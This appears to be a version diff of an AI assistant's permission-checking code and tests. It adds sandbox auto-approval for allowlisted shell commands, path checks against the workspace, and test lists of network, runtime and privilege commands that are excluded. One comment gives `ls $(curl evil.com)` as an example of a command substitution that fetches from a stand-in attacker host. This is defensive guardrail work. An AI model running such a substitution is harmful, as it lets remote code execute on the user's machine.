@vellumai/assistant 0.6.5 → 0.6.6

package/src/permissions/checker.ts

@@ -1,6 +1,6 @@
 import { createHash } from "node:crypto";
 import { homedir } from "node:os";
-import { dirname, resolve } from "node:path";
+import { dirname, join, resolve } from "node:path";
 
 import { isAssistantFeatureFlagEnabled } from "../config/assistant-feature-flags.js";
 import { getIsContainerized } from "../config/env-registry.js";
@@ -16,18 +16,28 @@ import {
   looksLikePathOnlyInput,
 } from "../tools/network/url-safety.js";
 import { getTool } from "../tools/registry.js";
+import { getWorkspaceDir } from "../util/platform.js";
 import {
   type ApprovalContext,
   DefaultApprovalPolicy,
   resolveThreshold,
 } from "./approval-policy.js";
+import { parseArgs } from "./arg-parser.js";
 import { bashRiskClassifier } from "./bash-risk-classifier.js";
+import { DEFAULT_COMMAND_REGISTRY } from "./command-registry.js";
 import { fileRiskClassifier } from "./file-risk-classifier.js";
-import { type RiskAssessment, riskToRiskLevel } from "./risk-types.js";
+import { getAutoApproveThreshold } from "./gateway-threshold-reader.js";
 import {
+  type CommandRiskSpec,
+  type RiskAssessment,
+  riskToRiskLevel,
+} from "./risk-types.js";
+import { scheduleRiskClassifier } from "./schedule-risk-classifier.js";
+import {
+  analyzeShellCommand,
   buildShellAllowlistOptions,
-  buildShellCommandCandidates,
   cachedParse,
+  deriveShellActionKeys,
   type ParsedCommand,
 } from "./shell-identity.js";
 import { skillLoadRiskClassifier } from "./skill-risk-classifier.js";
@@ -40,7 +50,10 @@ import {
   type ScopeOption,
 } from "./types.js";
 import { webRiskClassifier } from "./web-risk-classifier.js";
-import { isWorkspaceScopedInvocation } from "./workspace-policy.js";
+import {
+  isPathWithinWorkspaceRoot,
+  isWorkspaceScopedInvocation,
+} from "./workspace-policy.js";
 
 // ── Risk classification cache ────────────────────────────────────────────────
 // classifyRisk() is called on every permission check and can invoke WASM
@@ -242,10 +255,27 @@ async function buildCommandCandidates(
   preParsed?: ParsedCommand,
 ): Promise<string[]> {
   if (toolName === "bash" || toolName === "host_bash") {
-    return buildShellCommandCandidates(
-      getStringField(input, "command"),
-      preParsed,
-    );
+    const command = getStringField(input, "command").trim();
+    if (!command) return [command];
+
+    const analysis = await analyzeShellCommand(command, preParsed);
+    const actionResult = deriveShellActionKeys(analysis);
+
+    const candidates: string[] = [command];
+
+    if (actionResult.keys.length > 0) {
+      if (actionResult.isSimpleAction && actionResult.primarySegment) {
+        const canonical = actionResult.primarySegment.command;
+        if (canonical !== command) {
+          candidates.push(canonical);
+        }
+      }
+      for (const actionKey of actionResult.keys) {
+        candidates.push(actionKey.key);
+      }
+    }
+
+    return [...new Set(candidates)];
   }
 
   if (toolName === "skill_load") {
@@ -475,6 +505,19 @@ export async function classifyRisk(
       reason: assessment.reason,
     };
   }
+  // ── Schedule tools: delegate to ScheduleRiskClassifier ──────────────────
+  else if (toolName === "schedule_create" || toolName === "schedule_update") {
+    const assessment = await scheduleRiskClassifier.classify({
+      toolName,
+      mode: getStringField(input, "mode") || undefined,
+      script: getStringField(input, "script") || undefined,
+    });
+    classifierAssessment = assessment;
+    result = {
+      level: riskToRiskLevel(assessment.riskLevel),
+      reason: assessment.reason,
+    };
+  }
   // ── Remaining tools: fall through to registry-based classification ──────
   else {
     result = {
@@ -589,13 +632,80 @@ export async function check(
     policyContext,
   );
 
+  // Resolve sandboxAutoApprove for bash commands — all pipeline segments must be
+  // on the allowlist, and the command must not contain opaque constructs or
+  // dangerous patterns (e.g. `ls $(curl evil.com)` has an allowlisted program
+  // but a command substitution that could execute arbitrary code).
+  //
+  // For non-containerized environments, path resolution is applied: each
+  // segment's arguments are parsed via the command's argSchema, and all
+  // path arguments must resolve within the workspace root. Containerized
+  // environments skip path checks since the entire filesystem is the workspace.
+  let hasSandboxAutoApprove = false;
+  if (toolName === "bash" && shellParsed) {
+    const workspaceRoot = getWorkspaceDir();
+    const isContainerized = getIsContainerized();
+
+    hasSandboxAutoApprove =
+      shellParsed.segments.length > 0 &&
+      !shellParsed.hasOpaqueConstructs &&
+      shellParsed.dangerousPatterns.length === 0 &&
+      shellParsed.segments.every((seg) => {
+        const name = seg.program.split("/").pop() ?? seg.program;
+        const spec: CommandRiskSpec | undefined = Object.hasOwn(
+          DEFAULT_COMMAND_REGISTRY,
+          name,
+        )
+          ? DEFAULT_COMMAND_REGISTRY[
+              name as keyof typeof DEFAULT_COMMAND_REGISTRY
+            ]
+          : undefined;
+        if (!spec?.sandboxAutoApprove) return false;
+
+        // Containerized: entire fs is workspace, skip path checks
+        if (isContainerized) return true;
+
+        // Non-containerized: parse args and check all path args against workspace
+        const schema = spec.argSchema ?? {};
+        const parsed = parseArgs(seg.args, schema);
+
+        // If no path args, auto-approve (operating on cwd/stdin which is workspace)
+        if (parsed.pathArgs.length === 0) return true;
+
+        // All path args must resolve within workspace
+        return parsed.pathArgs.every((p) => {
+          // Handle ~ expansion: ~/ is current user's home, ~user/ is another
+          // user's home. Both resolve outside the workspace in practice.
+          // Treat any tilde-prefixed path as outside workspace unless it
+          // happens to resolve within it after expansion.
+          if (p === "~" || p.startsWith("~/")) {
+            const expanded =
+              p === "~" ? homedir() : join(homedir(), p.slice(2));
+            return isPathWithinWorkspaceRoot(expanded, workspaceRoot);
+          }
+          if (p.startsWith("~")) {
+            // ~root/, ~user/, etc. — resolve outside workspace
+            return false;
+          }
+          const resolved = p.startsWith("/") ? p : resolve(workingDir, p);
+          return isPathWithinWorkspaceRoot(resolved, workspaceRoot);
+        });
+      });
+  }
+
   // Build approval context from local variables
   const tool = getTool(toolName);
   const config = getConfig();
-  const resolvedThreshold = resolveThreshold(
-    config.permissions.autoApproveUpTo,
+  const gatewayThreshold = await getAutoApproveThreshold(
+    policyContext?.conversationId,
     policyContext?.executionContext,
   );
+  const resolvedThreshold =
+    gatewayThreshold ??
+    resolveThreshold(
+      config.permissions.autoApproveUpTo,
+      policyContext?.executionContext,
+    );
   const approvalContext: ApprovalContext = {
     riskLevel: risk,
     toolName,
@@ -607,10 +717,16 @@ export async function check(
         ? isWorkspaceScopedInvocation(toolName, input, workingDir)
         : false,
     toolOrigin:
-      tool?.origin === "skill" ? "skill" : tool ? "builtin" : undefined,
+      tool?.origin === "skill" || tool?.origin === "plugin"
+        ? "skill"
+        : tool
+          ? "builtin"
+          : undefined,
     isSkillBundled: tool?.ownerSkillBundled ?? false,
     hasManifestOverride: !!manifestOverride,
     autoApproveUpTo: resolvedThreshold,
+    isGatewayThreshold: gatewayThreshold != null,
+    hasSandboxAutoApprove,
   };
 
   // Delegate the allow/prompt/deny decision to the approval policy
@@ -675,10 +791,6 @@ function shellAllowlistStrategy(
   input: Record<string, unknown>,
 ): Promise<AllowlistOption[]> {
   const command = ((input.command as string) ?? "").trim();
-  // TODO(phase-3): Wire RiskAssessment.scopeOptions into permission prompts
-  // and retire buildShellAllowlistOptions + buildShellCommandCandidates from
-  // shell-identity.ts. The classifier's generateScopeOptions produces the
-  // canonical scope ladder; this legacy path should not diverge further.
   return buildShellAllowlistOptions(command);
 }
 
@@ -873,22 +985,26 @@ export async function generateAllowlistOptions(
 ): Promise<AllowlistOption[]> {
   signal?.throwIfAborted();
 
-  // Check if a classifier already produced allowlist options during
-  // classifyRisk(). If so, return those directly — avoids duplicate
-  // computation and keeps scope option generation unified with risk
-  // classification.
-  const aKey = assessmentCacheKey(toolName, input);
-  const cachedAssessment = assessmentCache.get(aKey);
-  if (
-    cachedAssessment?.allowlistOptions &&
-    cachedAssessment.allowlistOptions.length > 0
-  ) {
-    return cachedAssessment.allowlistOptions;
+  // When permission-controls-v3 is enabled, use classifier-produced options
+  // from the assessment cache (populated by BashRiskClassifier.classify()).
+  // When the flag is off, fall through to the legacy per-tool strategies
+  // (e.g. shellAllowlistStrategy for bash/host_bash) to avoid changing the
+  // allowlist pattern format for users who haven't opted in.
+  const config = getConfig();
+  if (isAssistantFeatureFlagEnabled("permission-controls-v3", config)) {
+    const aKey = assessmentCacheKey(toolName, input);
+    const cachedAssessment = assessmentCache.get(aKey);
+    if (
+      cachedAssessment?.allowlistOptions &&
+      cachedAssessment.allowlistOptions.length > 0
+    ) {
+      return cachedAssessment.allowlistOptions;
+    }
   }
 
-  // Fall back to the per-tool strategy function for tools that don't have
-  // classifier-produced options (e.g. bash tools use the shell identity
-  // strategy, or when the cache was missed).
+  // Fall back to the per-tool strategy function. For bash/host_bash when the
+  // flag is off, this uses shellAllowlistStrategy (action: key patterns).
+  // For other tools, this is the only path.
   if (Object.hasOwn(ALLOWLIST_STRATEGIES, toolName)) {
     return ALLOWLIST_STRATEGIES[toolName](toolName, input);
   }
@@ -896,6 +1012,18 @@ export async function generateAllowlistOptions(
   return [{ label: "*", description: "Everything", pattern: "*" }];
 }
 
+/**
+ * Retrieve a cached RiskAssessment for a given tool invocation.
+ * Returns `undefined` when no classifier-backed assessment exists
+ * (e.g. MCP tools, unknown tools that fall through to registry defaults).
+ */
+export function getCachedAssessment(
+  toolName: string,
+  input: Record<string, unknown>,
+): RiskAssessment | undefined {
+  return assessmentCache.get(assessmentCacheKey(toolName, input));
+}
+
 // Directory-based scope only applies to filesystem and shell tools.
 // All other tools auto-use "everywhere" (the client handles this).
 export const SCOPE_AWARE_TOOLS = new Set([

package/src/permissions/command-registry.test.ts

@@ -532,4 +532,243 @@ describe("command-registry", () => {
       expect(trustSubs).toContain("clear");
     });
   });
+
+  // ── sandboxAutoApprove allowlist guard ───────────────────────────────────
+  describe("sandboxAutoApprove allowlist", () => {
+    /** Collect all top-level commands tagged with sandboxAutoApprove: true. */
+    function getSandboxAutoApproveCommands(): string[] {
+      return Object.entries(DEFAULT_COMMAND_REGISTRY)
+        .filter(
+          ([, spec]) => (spec as CommandRiskSpec).sandboxAutoApprove === true,
+        )
+        .map(([name]) => name)
+        .sort();
+    }
+
+    /**
+     * The exact set of commands that should be tagged with sandboxAutoApprove.
+     * This acts as a guard — any addition or removal must be intentional and
+     * update this list.
+     */
+    const EXPECTED_SANDBOX_AUTO_APPROVE = [
+      // Core filesystem (read-only)
+      "ls",
+      "cat",
+      "head",
+      "tail",
+      "less",
+      "more",
+      "wc",
+      "file",
+      "stat",
+      "du",
+      "df",
+      "diff",
+      "tree",
+      "pwd",
+      "realpath",
+      "basename",
+      "dirname",
+      "readlink",
+      // Search / filter / text processing
+      "grep",
+      "rg",
+      "ag",
+      "ack",
+      "sort",
+      "uniq",
+      "cut",
+      "tr",
+      "sed",
+      // awk excluded: system() can execute arbitrary commands
+      // System info / text output
+      "echo",
+      "printf",
+      // Data processing
+      "jq",
+      "yq",
+      // find excluded: -exec/-execdir/-delete can execute arbitrary commands or delete files
+      "fd",
+      // Write commands
+      "cp",
+      "mv",
+      "mkdir",
+      "touch",
+      "ln",
+      "tee",
+      // Delete commands
+      "rm",
+      "rmdir",
+      // Permissions / ownership
+      "chgrp",
+      "chmod",
+      "chown",
+      // Archives
+      "tar",
+      "zip",
+      "unzip",
+      "gzip",
+      "gunzip",
+    ].sort();
+
+    test("sandboxAutoApprove commands match the expected allowlist exactly", () => {
+      const actual = getSandboxAutoApproveCommands();
+      expect(actual).toEqual(EXPECTED_SANDBOX_AUTO_APPROVE);
+    });
+
+    test("network commands are NOT tagged with sandboxAutoApprove", () => {
+      const networkCommands = [
+        "curl",
+        "wget",
+        "http",
+        "ssh",
+        "scp",
+        "rsync",
+        "ping",
+        "dig",
+        "nslookup",
+      ];
+      for (const cmd of networkCommands) {
+        const spec = (
+          DEFAULT_COMMAND_REGISTRY as Record<string, CommandRiskSpec>
+        )[cmd];
+        expect(spec).toBeDefined();
+        expect(spec.sandboxAutoApprove).not.toBe(true);
+      }
+    });
+
+    test("runtime/language commands are NOT tagged with sandboxAutoApprove", () => {
+      const runtimeCommands = [
+        "node",
+        "deno",
+        "python",
+        "python3",
+        "ruby",
+        "bash",
+        "sh",
+        "zsh",
+      ];
+      for (const cmd of runtimeCommands) {
+        const spec = (
+          DEFAULT_COMMAND_REGISTRY as Record<string, CommandRiskSpec>
+        )[cmd];
+        expect(spec).toBeDefined();
+        expect(spec.sandboxAutoApprove).not.toBe(true);
+      }
+    });
+
+    test("package manager commands are NOT tagged with sandboxAutoApprove", () => {
+      const packageCommands = [
+        "npm",
+        "npx",
+        "yarn",
+        "pnpm",
+        "bun",
+        "pip",
+        "pip3",
+        "brew",
+        "cargo",
+        "apt-get",
+        "apt",
+        "dnf",
+        "yum",
+        "pacman",
+        "apk",
+      ];
+      for (const cmd of packageCommands) {
+        const spec = (
+          DEFAULT_COMMAND_REGISTRY as Record<string, CommandRiskSpec>
+        )[cmd];
+        expect(spec).toBeDefined();
+        expect(spec.sandboxAutoApprove).not.toBe(true);
+      }
+    });
+
+    test("every sandboxAutoApprove command must have argSchema defined", () => {
+      const missing: string[] = [];
+      for (const [name, spec] of Object.entries(DEFAULT_COMMAND_REGISTRY)) {
+        if (
+          (spec as CommandRiskSpec).sandboxAutoApprove === true &&
+          (spec as CommandRiskSpec).argSchema === undefined
+        ) {
+          missing.push(name);
+        }
+      }
+      expect(missing).toEqual([]);
+    });
+
+    test("xargs is NOT tagged with sandboxAutoApprove", () => {
+      const spec = (DEFAULT_COMMAND_REGISTRY as Record<string, CommandRiskSpec>)
+        .xargs;
+      expect(spec).toBeDefined();
+      expect(spec.sandboxAutoApprove).not.toBe(true);
+    });
+
+    test("commands with value-consuming argRule flags have matching argSchema.valueFlags", () => {
+      // When an argRule has both `flags` and `valuePattern`, those flags consume
+      // the next token as a value — the valuePattern matches against that value.
+      // The command's argSchema.valueFlags must include those flags so that
+      // parseArgs() correctly pairs flags with their values.
+      const errors: string[] = [];
+
+      function checkSpec(spec: CommandRiskSpec, path: string): void {
+        if (spec.argRules) {
+          for (const rule of spec.argRules) {
+            if (rule.flags && rule.valuePattern) {
+              // This rule's flags consume a value — check argSchema coverage.
+              const schemaValueFlags = new Set(
+                spec.argSchema?.valueFlags ?? [],
+              );
+              for (const flag of rule.flags) {
+                if (!schemaValueFlags.has(flag)) {
+                  errors.push(
+                    `${path}/${rule.id}: flag "${flag}" consumes a value (has valuePattern) ` +
+                      `but is not listed in argSchema.valueFlags`,
+                  );
+                }
+              }
+            }
+          }
+        }
+        if (spec.subcommands) {
+          for (const [sub, subSpec] of Object.entries(spec.subcommands)) {
+            checkSpec(subSpec, `${path} ${sub}`);
+          }
+        }
+      }
+
+      for (const [name, spec] of Object.entries(DEFAULT_COMMAND_REGISTRY)) {
+        checkSpec(spec as CommandRiskSpec, name);
+      }
+      expect(errors).toEqual([]);
+    });
+
+    test("system/privilege commands are NOT tagged with sandboxAutoApprove", () => {
+      const systemCommands = [
+        "sudo",
+        "su",
+        "doas",
+        "mount",
+        "umount",
+        "systemctl",
+        "service",
+        "launchctl",
+        "reboot",
+        "shutdown",
+        "kill",
+        "killall",
+        "pkill",
+        "dd",
+        "mkfs",
+        "fdisk",
+      ];
+      for (const cmd of systemCommands) {
+        const spec = (
+          DEFAULT_COMMAND_REGISTRY as Record<string, CommandRiskSpec>
+        )[cmd];
+        expect(spec).toBeDefined();
+        expect(spec.sandboxAutoApprove).not.toBe(true);
+      }
+    });
+  });
 });